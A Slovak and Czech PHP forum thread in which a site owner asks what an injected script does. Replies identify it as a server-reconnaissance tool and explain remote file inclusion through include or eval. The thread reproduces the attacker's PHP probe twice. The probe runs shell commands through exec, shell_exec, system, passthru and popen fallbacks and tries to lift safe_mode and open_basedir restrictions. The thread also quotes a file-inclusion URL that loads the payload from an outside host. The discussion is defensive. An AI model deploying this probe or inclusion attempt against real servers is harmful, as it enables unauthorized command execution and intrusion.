Čo urobí script – PHP – Fórum – Programujte.com

Môže mi prosím niekto napísať, čo urobí tento script

/\/\/\ Response CMD /\/\/\Changing this CMD will result in corrupt scanning !

<?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ 

echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); } else{ 

ini_restore("safe_mode"); ini_restore("open_basedir"); 

if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe 

Mode of this Server is : "); echo("SafemodeOFF"); }else{ echo("Safe Mode of this 

Server is : "); echo("SafemodeON"); } } function ex($cfe){ $res = ''; if 

(!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = 

join("\n",$res); } elseif(function_exists('shell_exec')){ $res = 

@shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); 

@system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } 

elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = 

@ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = 

@popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } 

@pclose($f); } } return $res; } exit;

Lol das sem zpraseny kod a myslis si ze ho bude nekdo lustit?

To ebeš : kdes ho vzal?

Netuším k čemu to slouží, nicméně přikládám kód v upravené formě.

/\/\/\ Response CMD /\/\/\Changing this CMD will result in corrupt scanning !



<?php 



function ex($cfe) 

{ 

  $res = ''; 

  if (!empty($cfe))

  { 

    if(function_exists('exec'))

    { 

      @exec($cfe,$res); $res = join("\n",$res); 

    } 

    elseif(function_exists('shell_exec')){ 

      $res = @shell_exec($cfe); 

    } 

    elseif(function_exists('system'))

    { 

      @ob_start(); 

      @system($cfe); 

      $res = @ob_get_contents(); 

      @ob_end_clean(); } 

    elseif(function_exists('passthru'))

    { 

      @ob_start(); 

      @passthru($cfe);

      $res = @ob_get_contents(); @ob_end_clean(); 

    } 

    elseif(@is_resource($f = @popen($cfe,"r")))

    {

      $res = ""; 

      while(!@feof($f)) { 

        $res .= @fread($f,1024); 

      } 

    @pclose($f); 

    } 

  } 

  return $res; 

} 



if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ 

  echo("Safe Mode of this Server is : "); 

  echo("SafemodeOFF"); 

} 

else 

{ 

  ini_restore("safe_mode"); ini_restore("open_basedir"); 

  if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start"))))

  { 

    echo("Safe Mode of this Server is : "); 

    echo("SafemodeOFF"); 

  } 

  else 

  { 

    echo("Safe Mode of this Server is : "); 

    echo("SafemodeON"); 

  } 

} 

?>

To sa mi niekto snaží vložiť na stránku.
Mne to nič nehovorí, tak som chcela len skúsiť, či to niekto nepozná

Tak ještě ten link, kde se to nachází:
http://www.theopensourcerer.com/2007/12/20/is-this-a-hackers-tool/

No zda se ze to scanuje jestli je aktivovany safemode a daji se provadet prikazy pres prikazovou radku. Samo o sobe to nic nedela, jen to dotycnemu poskytuje informace o serveru.

K čomu sú niekomu dobré údaje o serveri?
Nemôže si tymto spôsobom niečo zisťovať provider?
Našla som ešte jeden script, ktory si tiež niečo zisťoval o serveri

Pokud tam muze nahrat tohle, tak tam muze nahrat i cokoliv jineho.

A provider tyhle informaci vi, ten si je nepotrbuje zjistovat.

Nie som v tom moc zbehla
Poznam php, mysql injection, XSS utoky
Snažím sa pred nimi stránku zabezpečiť,ale asi mi stále niečo uniká
Sledujem kto, kedy, z kade ide na stránku. Občas tam najdem takéto zvláštnosti, ale nedokážem pochopiť,ako to pracuje
URL mojej main stránky je www.domena.sk/index.php?strana = main
Čo sa deje, keď zadám do prehliadača
www.domena.sk/index.php?stranka=http://www.iglesialcs.cl/newweb/cache/arab.txt??
a zobrazí sa tam moja main strana
a na adrese http://www.iglesialcs.cl/newweb/cache/arab.txt?? je už hore popísaný script ?

Ten skript se spusti za predpokladu, ze tam mas bud include nebo eval. Obe tyto funkce jsouvelice nebezpecne v kombinaci s uzivatelskym vstupem. Vzdy musis kontrolovat, co includujes nebo evalujes, jinak to proste nejde a pak si s tvou trankou muze kdokoliv delat co chce.

Ďakujem za trpezlivosť.
Takže, keďže sa zobrazila moja stránka a nie vysledok scriptu, utok sa nepodaril?
Nemám include ani eval.Zobrazenie mám riešené cez funkcie a výstup z databázy mám tiež ošetrený.